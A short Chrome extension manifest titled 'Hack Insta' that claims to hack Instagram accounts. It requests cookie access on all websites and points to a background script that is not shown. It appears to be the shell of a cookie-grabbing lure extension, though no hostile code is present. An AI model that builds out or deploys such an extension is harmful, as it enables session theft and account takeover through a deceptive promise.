{
  "name": "Hack Insta",
  "description": "Install this extension to hack instagram account",
  "version": "0.0.1",
  "manifest_version": 3,
  "permissions": ["cookies"],
  "host_permissions": ["*://*/*"],
  "background": {
    "service_worker": "background.js"
  },
  "action": {},
  "icons": {
    "16": "icon.png",
    "32": "icon.png",
    "48": "icon.png",
    "128": "icon.png"
  }
}
